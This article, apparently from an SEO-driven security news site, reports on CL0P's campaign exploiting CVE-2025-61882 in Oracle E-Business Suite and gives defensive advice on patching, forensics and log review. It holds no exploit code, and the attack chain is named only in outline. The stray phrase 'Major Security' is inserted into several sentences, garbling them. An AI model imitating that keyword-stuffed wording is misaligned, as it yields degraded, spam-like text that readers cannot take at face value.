Google has issued a critical alert revealing that dozens of organizations have been compromised in a sophisticated hacking campaign targeting Oracle’s E-Business Suite through the exploitation of CVE-2025-61882, a critical vulnerability with a CVSS score of 9.8 that allows unauthenticated attackers to achieve remote code execution. This alarming discovery marks one of the most significant Major Security cybersecurity incidents affecting enterprise business infrastructure, with mass amounts of sensitive customer data stolen in what security experts believe to be a highly coordinated operation.

The threat actor behind this ambitious hacking campaign is believed to be CL0P, a dangerous ransomware group that has exploited multiple Oracle E-Business Suite vulnerabilities including a zero-day flaw to steal large amounts of data from several victims. The scope and sophistication of this Oracle EBS hacking campaign underscore the critical importance of Major Security cybersecurity preparedness for organizations running Oracle business software solutions.

What is the Oracle EBS Hacking Campaign?

Understanding the Scope of the CVE-2025-61882 Vulnerability

Based on emerging evidence and ongoing forensic investigations, CL0P orchestrated an intrusion that allowed unauthorized access to on-premise, customer-managed Oracle E-Business Suite solutions, enabling data enumeration and exfiltration between July and September 2025. This means that organizations using Oracle’s business management software were vulnerable to attackers gaining complete access to their most critical business data without requiring authentication credentials.

The vulnerability identified as CVE-2025-61882 is particularly dangerous because it affects the Oracle Concurrent Processing component of the E-Business Suite. CL0P’s attacks exploit a sophisticated server-side chain using SSRF and CRLF injection to force EBS servers to fetch and execute malicious XSL payloads, achieving remote code execution without disk-based artifacts. This technical sophistication demonstrates that the attackers invested significant resources in developing attack methods that avoid traditional detection mechanisms.

Timeline of the Oracle EBS Hacking Campaign

The Oracle EBS hacking campaign unfolded in distinct phases. CL0P exploited multiple vulnerabilities in Oracle EBS since at least August 2025, stealing large amounts of data from several victims and sending extortion emails since the end of September 2025. The extended timeline between initial compromise and extortion attempts suggests attackers spent considerable time within victim networks, gathering intelligence and exfiltrating data before making their presence known through ransom demands.

CL0P Ransomware Group: A History of Sophisticated Attacks

Who is Behind the Oracle EBS Hacking Campaign?

CL0P is not a newcomer to large-scale Major Security cybercriminal operations. Google’s investigation noted that the group has demonstrated a long history of compromising third-party software and service providers. This particular Oracle EBS hacking campaign represents a continuation of CL0P’s established operational model, which focuses on targeting widely-used enterprise software to maximize the number of victim organizations and the volume of data that can be stolen.

The group’s history includes previous attacks against major software supply chains, making them one of the most dangerous threat actors in the global cybersecurity landscape. Their targeting of Oracle, a company serving millions of businesses worldwide through its E-Business Suite, amplifies the potential impact of this breach exponentially.

The Oracle EBS Hacking Campaign: How Attackers Operated

Multi-Stage Attack Methodology

A widespread orchestrated email extortion campaign emerged targeting users of on-premise, customer-managed Oracle E-Business Suite between the end of September 2025 and beginning of October 2025. The extortion phase of this Oracle EBS hacking campaign involved threatening to sell stolen data unless organizations paid substantial ransom fees.

Ransom Demands and Extortion Tactics

Threat actors in the CL0P-linked campaign have been making ransom demands as high as $50 million, backing up their claims with proofs of compromise. These enormous demands reflect the critical nature of the data stolen and the potential business impact on affected organizations. The fact that attackers can provide proof of compromise makes these threats particularly credible and difficult for victims to ignore.

What Data Was Stolen in the Oracle EBS Hacking Campaign?

Mass Amounts of Customer Information at Risk

Google confirmed that “mass amounts of customer data” were stolen in this operation. Organizations using Oracle E-Business Suite depend on this platform to manage essential business functions including customer relationships, supplier interactions, manufacturing processes, logistics operations, and financial transactions. The breadth of functions managed through Oracle EBS means that the stolen data likely includes:

• Customer personal information and contact details
• Supplier and vendor business intelligence
• Manufacturing specifications and production data
• Logistics and supply chain information
• Financial transaction records
• Internal business communications and documents

This comprehensive data theft creates significant risks not only for the directly affected organizations but also for their customers, suppliers, and business partners whose information may have been compromised.

Industry Response to the Oracle EBS Hacking Campaign

Google’s Investigation and Findings

Google, through its security research team, discovered the campaign and analyzed the threat actor’s techniques. The investigation revealed that CL0P likely dedicated significant resources to pre-attack research before executing the intrusion into Oracle E-Business Suite systems. This level of preparation suggests that attackers studied Oracle’s infrastructure for an extended period before launching their attacks, making detection and prevention increasingly difficult.

Oracle’s Official Response

Oracle confirmed the reports of extortion activity targeting its clients but has not publicly disclosed the full extent of the compromises. The company is working with affected customers and security researchers to develop and deploy patches for the vulnerability. Organizations running Oracle EBS should expect guidance from Oracle regarding patching procedures and interim security measures.

Critical Actions for Oracle EBS Users

Immediate Steps to Take

Organizations using Oracle E-Business Suite should immediately take the following actions:

Apply Security Patches: Install Oracle’s emergency patches for CVE-2025-61882 as soon as they become available. This is the most critical step to prevent new intrusions through this vulnerability.

Conduct Forensic Investigation: Organizations that suspect they may be affected should engage cybersecurity forensic professionals to determine if unauthorized access has occurred within their systems.

Monitor for Extortion Communications: If your organization has received suspicious emails claiming to have compromised your Oracle EBS system, preserve all communications and contact law enforcement and cybersecurity professionals immediately.

Review Access Logs: Analyze Oracle EBS access logs from August 2025 forward to identify any suspicious activities or unauthorized access attempts.

Notify Stakeholders: If your organization has been compromised, notify customers, suppliers, and relevant stakeholders about the potential data exposure in accordance with applicable data breach notification laws.

Understanding CVE-2025-61882: The Technical Vulnerability

CVSS Score and Severity Assessment

CVE-2025-61882 has a CVSS score of 9.8, indicating a critical vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise and take control of the Oracle Concurrent Processing component. A CVSS score of 9.8 represents near-maximum severity, meaning the vulnerability is extremely dangerous and should be prioritized as the highest security concern.

Why This Vulnerability is Particularly Dangerous

The vulnerability is remotely exploitable without requiring authentication, meaning attackers do not need valid user credentials to compromise systems. This removes a significant barrier to entry that would normally protect enterprise systems. The combination of remote exploitability, lack of authentication requirement, and the critical nature of Oracle E-Business Suite makes this vulnerability exceptionally dangerous in real-world attack scenarios.

Expert Analysis of the Oracle EBS Hacking Campaign

Security researchers have provided Major Security detailed analysis of the CL0P campaign. According to Jake Knott, principal security researcher at watchTowr, CL0P has been exploiting multiple vulnerabilities in Oracle EBS since at least August 2025, stealing large amounts of data from several victims.

The extended timeline of exploitation before public disclosure suggests that the vulnerability was unknown to Oracle for an extended period. This type of zero-day vulnerability exploitation gives attackers a significant advantage, as defenders cannot rely on patches to protect their systems.

Conclusion: The Oracle EBS Hacking Campaign and Future Security Implications

The Oracle EBS hacking campaign affecting dozens of organizations represents a significant escalation in supply-chain focused cyberattacks. By targeting Oracle’s widely-used E-Business Suite, CL0P was able to compromise multiple enterprise organizations simultaneously, stealing vast amounts of sensitive data that affects not only the directly compromised organizations but also their entire ecosystem of customers, suppliers, and business partners.

This incident reinforces several critical cybersecurity lessons: the importance of timely patch management, the need for robust monitoring of enterprise applications, and the necessity of maintaining strong cybersecurity practices even within established organizations using trusted software platforms Major Security . Organizations must remain vigilant in implementing security updates and maintaining awareness of emerging threats to their critical business systems.

For more information on cybersecurity best practices and threat intelligence, visit Singhadarbar.